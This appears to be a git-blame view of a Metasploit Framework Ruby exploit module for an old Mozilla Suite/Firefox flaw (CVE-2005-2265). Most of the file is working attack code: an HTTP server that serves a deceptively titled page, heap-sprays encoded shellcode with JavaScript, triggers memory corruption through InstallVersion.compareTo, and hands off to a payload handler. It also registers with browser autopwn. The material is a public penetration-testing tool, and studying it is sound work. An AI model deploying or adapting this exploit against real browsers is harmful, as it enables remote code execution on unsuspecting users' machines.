2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-04-04 04:37:30 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = NormalRanking
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# This module acts as an HTTP server
|
|
|
|
#
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2006-07-31 02:50:41 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
2009-12-15 21:54:24 +00:00
|
|
|
# The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
|
|
|
|
# and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
|
2009-07-22 20:14:35 +00:00
|
|
|
autopwn_info({
|
|
|
|
:ua_name => HttpClients::FF,
|
2009-12-15 21:54:24 +00:00
|
|
|
:ua_minver => "1.0",
|
2010-07-13 09:03:56 +00:00
|
|
|
:ua_maxver => "1.7.10",
|
2009-07-22 20:14:35 +00:00
|
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
|
|
:javascript => true,
|
|
|
|
:rank => NormalRanking, # reliable memory corruption
|
|
|
|
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
|
|
|
|
})
|
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',
|
|
|
|
'Description' => %q{
|
2010-04-30 08:40:19 +00:00
|
|
|
This module exploits a code execution vulnerability in the Mozilla
|
|
|
|
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
|
|
|
|
module is a direct port of Aviv Raff's HTML PoC.
|
2006-07-31 02:50:41 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2009-07-19 20:48:47 +00:00
|
|
|
'Author' => ['hdm', 'Aviv Raff <avivra [at] gmail.com>'],
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-04-30 08:40:19 +00:00
|
|
|
'References' =>
|
2006-07-31 02:50:41 +00:00
|
|
|
[
|
2009-07-19 20:48:47 +00:00
|
|
|
['CVE', '2005-2265'],
|
|
|
|
['OSVDB', '17968'],
|
2010-09-20 08:06:27 +00:00
|
|
|
['BID', '14242'],
|
2009-07-19 20:48:47 +00:00
|
|
|
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
|
2006-07-31 02:50:41 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 400,
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2009-12-14 23:27:28 +00:00
|
|
|
# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
|
|
|
|
# WinXP-SP3 and Win2kAS-SP0
|
2010-04-30 08:40:19 +00:00
|
|
|
[ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
|
2006-07-31 02:50:41 +00:00
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Arch' => ARCH_X86,
|
2009-12-14 23:27:28 +00:00
|
|
|
'Ret' => 0x0c0c0c0c,
|
2006-07-31 02:50:41 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
2009-12-14 23:27:28 +00:00
|
|
|
'DefaultTarget' => 0,
|
2011-05-04 20:43:19 +00:00
|
|
|
'DisclosureDate' => 'Jul 13 2005'
|
2006-07-31 02:50:41 +00:00
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
# Re-generate the payload
|
|
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
|
|
|
|
2012-04-20 19:31:42 +00:00
|
|
|
print_status("Sending #{self.name}")
|
2006-12-10 03:26:53 +00:00
|
|
|
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-04-04 04:37:30 +00:00
|
|
|
# Handle the payload
|
2006-07-31 02:50:41 +00:00
|
|
|
handler(cli)
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
def generate_html(payload)
|
|
|
|
|
|
|
|
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
|
|
|
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-12-14 23:27:28 +00:00
|
|
|
spray_to = sprintf("0x%.8x", target.ret)
|
|
|
|
spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
|
|
|
|
spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
|
|
|
|
eax_address = sprintf("0x%.8x", target.ret)
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
return %Q|
|
|
|
|
<html>
|
|
|
|
<head>
|
2010-04-30 08:40:19 +00:00
|
|
|
<!--
|
2010-09-20 08:06:27 +00:00
|
|
|
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
|
|
|
|
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
|
|
|
|
Greets: SkyLined, The Insider and shutdown
|
2006-07-31 02:50:41 +00:00
|
|
|
-->
|
|
|
|
<title>One second please...</title>
|
|
|
|
<script language="javascript">
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
function BodyOnLoad()
|
2006-07-31 02:50:41 +00:00
|
|
|
{
|
|
|
|
location.href="javascript:void (new InstallVersion());";
|
|
|
|
CrashAndBurn();
|
|
|
|
};
|
|
|
|
|
2009-12-14 23:27:28 +00:00
|
|
|
#{js_heap_spray}
|
2006-07-31 02:50:41 +00:00
|
|
|
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
|
2010-04-30 08:40:19 +00:00
|
|
|
function CrashAndBurn()
|
2006-07-31 02:50:41 +00:00
|
|
|
{
|
|
|
|
// Payload - Just return..
|
|
|
|
var payLoadCode=unescape("#{enc_code}");
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
// Size of the heap blocks
|
2006-07-31 02:50:41 +00:00
|
|
|
var heapBlockSize=0x400000;
|
2009-12-14 23:27:28 +00:00
|
|
|
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
// Set address to fake "pdata".
|
2009-07-19 20:48:47 +00:00
|
|
|
var eaxAddress = #{eax_address};
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
// This was taken from shutdown's PoC in bugzilla
|
|
|
|
// struct vtbl { void (*code)(void); };
|
|
|
|
// struct data { struct vtbl *pvtbl; };
|
|
|
|
//
|
|
|
|
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
|
|
|
|
// pdata->pvtbl->code(pdata);
|
|
|
|
//
|
|
|
|
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
|
|
|
|
}
|
|
|
|
// -->
|
|
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body onload="BodyOnLoad()">
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2009-07-16 16:02:24 +00:00
|
|
|
end
|